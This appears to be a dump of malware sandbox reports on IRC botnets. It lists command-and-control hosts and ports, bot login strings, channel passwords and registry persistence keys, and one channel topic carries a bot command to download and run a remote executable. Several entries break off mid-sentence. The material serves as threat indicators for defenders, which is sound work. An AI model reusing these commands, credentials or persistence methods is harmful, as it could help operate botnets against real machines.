blabla.douteux.info

IRC Conversations: 94.47.254.1:6692
Nick: lswmOLdb
Username: jryzondt
Joined Channel: #0
Channel Topic for Channel #0: "=C1nNBnfNVDkkQRqxCbVec51gkackSc6brTZ"
Topic By: [ ggbdg ]

keno.hizzibolla.com

keno.hizzibolla.com 69.42.218.75
Resolved: [keno.hizzibolla.com] To [69.42.218.75]
C&C Server: 69.42.218.75:8878
Server Password:
Username: iyicpazy
Nickname: obZhzECbX
Channel: #maxi (Password: )
Channeltopic: :=glRW7E+NAInKAWQQ9QNpMjm2/81PJzDl0ggaCl8I9h9tSzyjtM4cn6mC9aL1JrmzdqVs5/a9kXPXyRkv7CNtD6uKgjNKvUDhzc7e7bNqdGGL+T/DDRuqVsdOVnWpBdDPucbFYwN/AJyLkrYs9h6fLKN6q3x
Topic By: [ eebab ]
Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Background Intelligent Transfer Service" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\bits.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\Explorer.EXE" = C:\WINDOWS\Explorer.EXE:*:Enabled:Background Intelligent Transfer Service
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"

ms.mobilerequests.com (Butterfly Bot)

ms.mobilerequests.com: type A, class IN, addr 89.149.223.140
udp port: 1863
Startup: explorer.exe (PID: 776 MD5: 12896823FB95BFB3DC9B46BCAEDC9923) wscntfy.exe (PID: 676 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
File created: C:\RECYCLER\S-1-5-21-5315288217-6398524660-645013835-9465 C:\RECYCLER\S-1-5-21-5315288217-6398524660-645013835-9465\Desktop.ini
Other file operations: C:\RECYCLER\S-1-5-21-5315288217-6398524660-645013835-9465

tes.enterhere2.biz (Butterfly Bot)

tes.stuckin.org: type A, class IN, addr 208.53.131.135
tes.memehehz.info: type A, class IN, addr 208.53.131.135
tes.enterhere2.biz: type A, class IN, addr 208.53.131.135
Startup: explorer.exe (PID: 776 MD5: 12896823FB95BFB3DC9B46BCAEDC9923) wscntfy.exe (PID: 676 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
udp ports: 57134, 4444
File Created: C:\RECYCLER\S-1-5-21-9031247443-7444027205-238249698-8303 C:\RECYCLER\S-1-5-21-9031247443-7444027205-238249698-8303\Desktop.ini
Memory written: 3 776 C:\WINDOWS\explorer.exe 00980000 success or wait 1 8 776 C:\WINDOWS\explorer.exe 00990000 success or

backup.kazeu.net (big net)

Resolved: [backup.kazeu.net] To [217.219.137.162]
Resolved: [backup.kazeu.net] To [218.206.248.154]
Resolved: [backup.kazeu.net] To [178.32.95.119]
178.32.95.119:23232
Nickname: n[USA|XPP|x32|HANS]qebjljr
User: 6625""
Joins channel: :#security-check#
Joins channel: #!icee PW: ERROR
Joins channel: :#!icee ..'..K..'.?...E..

irc.NaDe.gov

Remote Host Port Number
217.23.13.240 6374
NICK n{USA|XP}392156
USER 3921 "" "TsGh" :3921
JOIN #nade2#
PONG :irc.NaDe.gov
* The following port was open in the system:
Port Protocol Process
1053 TCP hidserv.exe (%AppData%\hidserv.exe)
Registry Modifications
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Windows Update System = "%AppData%\hidserv.exe"
so that hidserv.exe runs every

omgredrum.no-ip.biz

Remote Host Port Number
omgredrum.no-ip.biz 51987
Resolved: [omgredrum.no-ip.biz] To [69.65.19.117]
Resolved: [omgredrum.no-ip.biz] To [69.65.19.116]
PASS Virus
NICK VirUs-aruhtp
USER sntmwl "" "pup" :sntmwl
Registry Modifications
* The following Registry Key was created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}]
+ StubPath = "c:\RESTORE\S-1-5-21-1482476501-1644491937-682003330-1013\RedruMx.exe"
so that

205.234.236.32 (Parabola botnet)

Remote Host Port Number
184.73.209.168 80
204.0.5.41 80
204.0.5.58 80
204.0.5.59 80
207.38.101.12 80
208.43.117.134 80
216.178.38.168 80
63.135.80.58 80
63.135.86.25 80
63.135.86.37 80
205.234.236.32 1234
PASS xxx
NICK NEW-[USA|00|P|39592]
USER XP-5696 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|39592] -ix
JOIN #!nn! test
PONG 22
MOTD
* The data identified by the following URLs was then requested

nice.niceshot.in

nice.niceshot.in 67.202.108.130
C&C Server: 67.202.108.130:6567
PASS s1m0n3t4
Server Password:
Username: XP-1204
Nickname: [SI|DEU|00|P|86096]
Channel: #sucksusb# (Password: c1rc0dus0leil)
Channeltopic: :.desfi http://iphoneate.in/salario/yem.exe c:\WINDOWS\cap.exe 1
MODE [SI|USA|00|P|97963] -ix
JOIN #update# c1rc0dus0leil
PRIVMSG #update# :[Dl]: File download: 84.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_64066.exe @ 84.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|61951]
USER XP-8990 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|61951] -ix
JOIN

74.208.43.209

Remote Host Port Number
74.208.43.209 5000
JOIN ##[ENG]
JOIN #msn#
PONG :4DFB1F08
NICK [V2][ENG][COMPUTERNAME]9523
PING :redc00de.no-ip.biz
00000000 | 5041 5353 200D 0A55 7365 7220 6B6B 6B20 | PASS ..User kkk
00000010 | 6B6B 6B20 6B6B 6B20 6B6B 6B20 3A6B 6B6B | kkk kkk kkk :kkk
Registry Modifications
* The newly created Registry Values are:
o